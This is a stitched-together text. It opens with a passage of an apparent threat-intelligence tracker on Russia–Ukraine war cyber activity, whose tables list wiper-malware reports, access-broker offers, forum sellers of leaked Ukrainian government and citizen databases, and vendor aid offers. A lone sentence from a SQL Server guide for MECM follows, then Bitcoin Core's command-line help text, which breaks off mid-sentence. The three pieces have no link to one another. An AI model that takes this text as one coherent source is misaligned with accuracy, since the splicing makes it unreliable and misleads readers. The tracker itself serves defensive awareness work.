UNC1151/Ghostwriter (Belarus MoD) | [CERT_UA Facebook](https://facebook.com/story.php?story_fbid=313517477474184&id=100064478028712) | ​| 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | [twitter.com/joes_mcgill](https://twitter.com/joes_mcgill/status/1497609555856932864?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | [cisa.gov](https://www.cisa.gov/uscert/ncas/alerts/aa22-057a) | ​| 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | [bloomberg.com](https://www.bloomberg.com/news/articles/2022-02-26/hackers-destroyed-data-at-key-ukraine-agency-before-invasion?sref=ylv224K8) | ​| 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | [twitter.com/FedorovMykhailo](https://twitter.com/FedorovMykhailo/status/1497642156076511233) | ​| 26 FEB | Yoroi | HermeticWiper | [yoroi.company](https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures) | ​| 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] |  ​| 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | ​| 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | ​| 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | [TechARP](https://www-techarp-com.cdn.ampproject.org/c/s/www.techarp.com/internet/chinese-media-leaks-ukraine-censor/?amp=1)| ​| 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | [Microsoft](https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/?preview_id=65075) | ​| 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | [https://twitter.com/heymingwei](https://twitter.com/heymingwei/status/1498362715198263300?s=20&t=Ju31gTurYc8Aq_yZMbvbxg) | ​| 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | [twitter.com/cyberknow20](https://twitter.com/cyberknow20/status/1498434090206314498?s=21) |  ​| 1 MAR | ESET | IsaacWiper and HermeticWizard | [welivesecurity.com](https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/) | ​| 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445/UNC1151/Ghostwriter) | [proofpoint.com](https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails) | ​| 1 MAR | Elastic | HermeticWiper | [elastic.github.io](https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/) | ​| 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | [CrowdStrike](https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/) | ​| 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | [zscaler.com](https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense) | ​| 3 MAR | @ShadowChasing1 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/ShadowChasing1](https://twitter.com/ShadowChasing1/status/1499361093059153921) | ​| 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | [twitter.com/vxunderground](https://twitter.com/vxunderground/status/1499374914758918151?s=20&t=jyy9Hnpzy-5P1gcx19bvIA) | ​| 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing "#istandwithputin" and "#istandwithrussia" propaganda (in English) | [twitter.com/kylaintheburgh](https://twitter.com/kylaintheburgh/status/1499350578371067906?s=21) | ​| 3 MAR | @tracerspiff | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com](https://twitter.com/tracerspiff/status/1499444876810854408?s=21) | ​####​ ​`Access Brokers` ​| Date | Threat(s) | Source | ​| --- | --- | --- | ​| 23 JAN | Access broker "Mont4na" offering UkrFerry | RaidForums [not linked] | ​| 23 JAN | Access broker "Mont4na" offering PrivatBank | RaidForums [not linked] | ​| 24 JAN | Access broker "Mont4na" offering DTEK | RaidForums [not linked] | ​| 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | ​| 28 FEB | "w1nte4mute" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | ​####​ ​`Data Brokers` ​| Threat Actor    | Type            | Observation                                                                                               | Validated | Relevance                     | Source                                                     | ​| --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | ​| aguyinachair    | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation)                                           | No        | TA discussion in past 90 days | ELeaks Forum \[not linked\]                                | ​| an3key          | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua)           | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| an3key          | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted\[.\]mvs\[.\]gov\[.\]ua)                              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank\[.\]ua)                                                  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | DB of "border crossing" DBs of DPR and LPR                                                                | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (7.5M) of Ukrainian passports                                                                      | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records                    | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (2.1M) of Ukrainian citizens                                                                       | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos)                                  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (1M) of Ukrainian postal/courier service customers (novaposhta\[.\]ua)                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone\[.\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell\[.\]ua)                                              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| CorelDraw       | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar\[.\]ua)                                             | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| danieltx51      | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa\[.\]gov\[.\]ua)                                         | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc)          | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Featherine      | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine              | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted\[.\]mvs\[.\]gov\[.\]ua)  | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua)          | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu\[.\]ua)                                                    | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | PII DB of Ukrainian digital-medicine provider (medstar\[.\]ua)                                            | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| FreeCivilian    | UA data sharing | DB of ticket.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of id.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of my.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of portal.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of anti-violence-map.msp.gov.ua                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dopomoga.msp.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of e-services.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of edu.msp.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of education.msp.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of ek-cbi.msp.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mail.msp.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of portal-gromady.msp.gov.ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of web-minsoc.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of wcs-wim.dsbt.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich.com                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dsns.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mon.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of zt.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mvs.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dsbt.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of forest.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of nkrzi.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dabi.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of comin.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dp.dpss.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of esbu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mms.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mova.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mspu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of nads.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of reintegration.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of sies.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of sport.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mepr.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of va.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mtu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cg.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of ch-tmo.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cp.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of cpd.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dndekc.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua                                                                            | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of dpvs.hsc.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of odk.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of e-driver\[.\]hsc\[.\]gov\[.\]ua                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of wanted\[.\]mvs\[.\]gov\[.\]ua                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minregeion\[.\]gov\[.\]ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of health\[.\]mia\[.\]solutions                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mtsbu\[.\]ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich\[.\]com                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kyivcity\[.\]com                                                                                    | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of bdr\[.\]mvs\[.\]gov\[.\]ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of gkh\[.\]in\[.\]ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of kmu\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mon\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of minagro\[.\]gov\[.\]ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| FreeCivilian    | UA data sharing | DB of mfa\[.\]gov\[.\]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion \[not linked\]                         | ​| Intel\_Data     | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Kristina        | UA data sharing | DB of Ukrainian National Police (mvs\[.\]gov\[.\]ua)                                                      | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| NetSec          | UA data sharing | PII DB (53M) of Ukrainian citizens                                                                        | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Psycho\_Killer  | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | Exploit Forum .onion \[not linked\]                        | ​| Sp333           | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides                                | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Vaticano        | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine \[copy\]     | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​| Vaticano        | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\[.\]gov\[.\]ua) \[copy\] | No        | TA discussion in past 90 days | RaidForums \[not linked; site hijacked since UA invasion\] | ​####​ ​`Vendor Support` ​| Vendor | Offering | URL | ​| --- | --- | --- | ​| Dragos | Access to Dragos service if from US/UK/ANZ and in need of ICS cybersecurity support | [twitter.com/RobertMLee](https://twitter.com/RobertMLee/status/1496862093588455429) | ​| GreyNoise |  Any and all `Ukrainian` emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | [twitter.com/Andrew___Morris](https://twitter.com/Andrew___Morris/status/1496923545712091139) | ​| Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| [recordedfuture.com](https://www.recordedfuture.com/ukraine/) | ​| Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | [go.flashpoint-intel.com](https://go.flashpoint-intel.com/trial/access/30days) | ​| ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| [twitter.com/threatable](https://twitter.com/threatable/status/1497233721803644950) | ​| Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | [github.com/Orange-Cyberdefense](https://github.com/Orange-Cyberdefense/russia-ukraine_IOCs)| ​| FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | [twitter.com/FSecure](https://twitter.com/FSecure/status/1497248407303462960) | ​| Multiple vendors | List of vendors offering their services to Ukraine for free, put together by [@chrisculling](https://twitter.com/chrisculling/status/1497023038323404803) | [docs.google.com/spreadsheets](https://docs.google.com/spreadsheets/d/18WYY9p1_DLwB6dnXoiiOAoWYD8X0voXtoDl_ZQzjzUQ/edit#gid=0) | ​| Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | [mandiant.com](https://www.mandiant.com/resources/insights/ukraine-crisis-resource-center) | ​| Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | [twitter.com/elonmusk](https://twitter.com/elonmusk/status/1497701484003213317) | ​| Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | [Romania's DNSC Press Release](https://dnsc.ro/citeste/press-release-dnsc-and-bitdefender-work-together-in-support-of-ukraine)| ​| BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | [bitdefender.com/ukraine/](https://www.bitdefender.com/ukraine/) | ​| NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | [twitter.com/Namecheap](https://twitter.com/Namecheap/status/1498998414020861953) | ​| Avast | Free decryptor for PartyTicket ransomware | [decoded.avast.io](https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/) |  ​####​ ​`Vetted OSINT Sources` ​| Handle | Affiliation | ​| --- | --- | ​| [@KyivIndependent](https://twitter.com/KyivIndependent) | English-language journalism in Ukraine | ​| [@IAPonomarenko](https://twitter.com/IAPonomarenko) | Defense reporter with The Kyiv Independent | ​| [@KyivPost](https://twitter.com/KyivPost) | English-language journalism in Ukraine | ​| [@Shayan86](https://twitter.com/Shayan86) | BBC World News Disinformation journalist | ​| [@Liveuamap](https://twitter.com/Liveuamap) | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | ​| [@DAlperovitch](https://twitter.com/DAlperovitch) | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | ​| [@COUPSURE](https://twitter.com/COUPSURE) | OSINT investigator for Centre for Information Resilience | ​| [@netblocks](https://twitter.com/netblocks) | London-based Internet's Observatory | ​####​ ​`Miscellaneous Resources` ​| Source | URL | Content | ​| --- | --- | --- | ​| PowerOutages.com | https://poweroutage.com/ua | Tracking PowerOutages across Ukraine | ​| Monash IP Observatory | https://twitter.com/IP_Observatory | Tracking IP address outages across Ukraine | ​| Project Owl Discord | https://discord.com/invite/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | ​| russianwarchatter.info | https://www.russianwarchatter.info/ | Known Russian Military Radio Frequencies |

The purpose of this document is to summarize the global recommendations from a SQL Server perspective, applied specifically to a Microsoft Endpoint Configuration Manager (MECM) environment. This document includes general best practices for SQL Server configuration and management

-? Print this help message and exit -alertnotify=<cmd> Execute command when a relevant alert is received or we see a really long fork (%s in cmd is replaced by message) -assumevalid=<hex> If this block is in the chain assume that it and its ancestors are valid and potentially skip their script verification (0 to verify all, default: 0000000000000000000b9d2ec5a352ecba0592946514a92f14319dc2b367fc72, testnet: 000000000000006433d1efec504c53ca332b64963c425395515b01977bd7b3b0, signet: 0000002a1de0f46379358c1fd09906f7ac59adf3712323ed90eb59e4c183c020) -blockfilterindex=<type> Maintain an index of compact filters by block (default: 0, values: basic). If <type> is not supplied or if <type> = 1, indexes for all known types are enabled. -blocknotify=<cmd> Execute command when the best block changes (%s in cmd is replaced by block hash) -blockreconstructionextratxn=<n> Extra transactions to keep in memory for compact block reconstructions (default: 100) -blocksdir=<dir> Specify directory to hold blocks subdirectory for *.dat files (default: <datadir>) -blocksonly Whether to reject transactions from network peers. Automatic broadcast and rebroadcast of any transactions from inbound peers is disabled, unless the peer has the 'forcerelay' permission. RPC transactions are not affected. (default: 0) -conf=<file> Specify path to read-only configuration file. Relative paths will be prefixed by datadir location. (default: bitcoin.conf) -daemon Run in the background as a daemon and accept commands -datadir=<dir> Specify data directory -dbcache=<n> Maximum database cache size <n> MiB (4 to 16384, default: 450). In addition, unused mempool memory is shared for this cache (see -maxmempool). -debuglogfile=<file> Specify location of debug log file. Relative paths will be prefixed by a net-specific datadir location. (-nodebuglogfile to disable; default: debug.log) -includeconf=<file> Specify additional configuration file, relative to the -datadir path (only useable from configuration file, not command line) -loadblock=<file> Imports blocks from external file on startup -maxmempool=<n> Keep the transaction memory pool below <n> megabytes (default: 300) -maxorphantx=<n> Keep at most <n> unconnectable transactions in memory (default: 100) -mempoolexpiry=<n> Do not keep transactions in the mempool longer than <n> hours (default: 336) -par=<n> Set the number of script verification threads (-8 to 15, 0 = auto, <0 = leave that many cores free, default: 0) -persistmempool Whether to save the mempool on shutdown and load on restart (default: 1) -pid=<file> Specify pid file. Relative paths will be prefixed by a net-specific datadir location. (default: bitcoind.pid) -prune=<n> Reduce storage requirements by enabling pruning (deleting) of old blocks. This allows the pruneblockchain RPC to be called to delete specific blocks, and enables automatic pruning of old blocks if a target size in MiB is provided. This mode is incompatible with -txindex and -rescan. Warning: Reverting this setting requires re-downloading the entire blockchain. (default: 0 = disable pruning blocks, 1 = allow manual pruning via RPC, >=550 = automatically prune block files to stay under the specified target size in MiB) -reindex Rebuild chain state and block index from the blk*.dat files on disk -reindex-chainstate Rebuild chain state from the currently indexed blocks. When in pruning mode or if blocks on disk might be corrupted, use full -reindex instead. -settings=<file> Specify path to dynamic settings data file. Can be disabled with -nosettings. File is written at runtime and not meant to be edited by users (use bitcoin.conf instead for custom settings). Relative paths will be prefixed by datadir location. (default: settings.json) -startupnotify=<cmd> Execute command on startup. -sysperms Create new files with system default permissions, instead of umask 077 (only effective with disabled wallet functionality) -txindex Maintain a full transaction index, used by the getrawtransaction rpc call (default: 0) -version Print version and exit Connection options: -addnode=<ip> Add a node to connect to and attempt to keep the connection open (see the `addnode` RPC command help for more info). This option can be specified multiple times to add multiple nodes. -asmap=<file> Specify asn mapping used for bucketing of the peers (default: ip_asn.map). Relative paths will be prefixed by the net-specific datadir location. -bantime=<n> Default duration (in seconds) of manually configured bans (default: 86400) -bind=<addr>[:<port>][=onion] Bind to given address and always listen on it (default: 0.0.0.0). Use [host]:port notation for IPv6. Append =onion to tag any incoming connections to that address and port as incoming Tor connections (default: 127.0.0.1:8334=onion, testnet: 127.0.0.1:18334=onion, signet: 127.0.0.1:38334=onion, regtest: 127.0.0.1:18445=onion) -connect=<ip> Connect only to the specified node; -noconnect disables automatic connections (the rules for this peer are the same as for -addnode). This option can be specified multiple times to connect to multiple nodes. -discover Discover own IP addresses (default: 1 when listening and no -externalip or -proxy) -dns Allow DNS lookups for -addnode, -seednode and -connect (default: 1) -dnsseed Query for peer addresses via DNS lookup, if low on addresses (default: 1 unless -connect used) -externalip=<ip> Specify your own public address -forcednsseed Always query for peer addresses via DNS lookup (default: 0) -listen Accept connections from outside (default: 1 if no -proxy or -connect) -listenonion Automatically create Tor onion service (default: 1) -maxconnections=<n> Maintain at most <n> connections to peers (default: 125) -maxreceivebuffer=<n> Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000) -maxsendbuffer=<n> Maximum per-connection send buffer, <n>*1000 bytes (default: 1000) -maxtimeadjustment Maximum allowed median peer time offset adjustment. Local perspective of time may be influenced by peers forward or backward by this amount. (default: 4200 seconds) -maxuploadtarget=<n> Tries to keep outbound traffic under the given target (in MiB per 24h). Limit does not apply to peers with 'download' permission. 0 = no limit (default: 0) -networkactive Enable all P2P network activity (default: 1). Can be changed by the setnetworkactive RPC command -onion=<ip:port> Use separate SOCKS5 proxy to reach peers via Tor onion services, set -noonion to disable (default: -proxy) -onlynet=<net> Make outgoing connections only through network <net> (ipv4, ipv6 or onion). Incoming connections are not affected by this option. This option can be specified multiple times to allow multiple networks. -peerblockfilters Serve compact block filters to peers per BIP 157 (default: 0) -peerbloomfilters Support filtering of blocks and transaction with bloom filters (default: 0) -permitbaremultisig Relay non-P2SH multisig (default: 1) -port=<port> Listen for connections on <port>. Nodes not using the default ports (default: 8333, testnet: 18333, signet: 38333, regtest: 18444) are unlikely to get incoming connections. -proxy=<ip:port> Connect through SOCKS5 proxy, set -noproxy to disable (default: disabled) -proxyrandomize Randomize credentials for every proxy connection. This enables Tor stream isolation (default: 1) -seednode=<ip> Connect to a node to retrieve peer addresses, and disconnect. This option can be specified multiple times to connect to multiple nodes. -timeout=<n> Specify connection timeout in milliseconds (minimum: 1, default: 5000) -torcontrol=<ip>:<port> Tor control port to use if onion listening enabled (default: 127.0.0.1:9051) -torpassword=<pass> Tor control port password (default: empty) -upnp Use UPnP to map the listening port (default: 0) -whitebind=<[permissions@]addr> Bind to the given address and add permission flags to the peers connecting to it. Use [host]:port notation for IPv6. Allowed permissions: bloomfilter (allow requesting BIP37 filtered blocks and transactions), noban (do not ban for misbehavior; implies download), forcerelay (relay transactions that are already in the mempool; implies relay), relay (relay even in -blocksonly mode, and unlimited transaction announcements), mempool (allow requesting BIP35 mempool contents), download (allow getheaders during IBD, no disconnect after 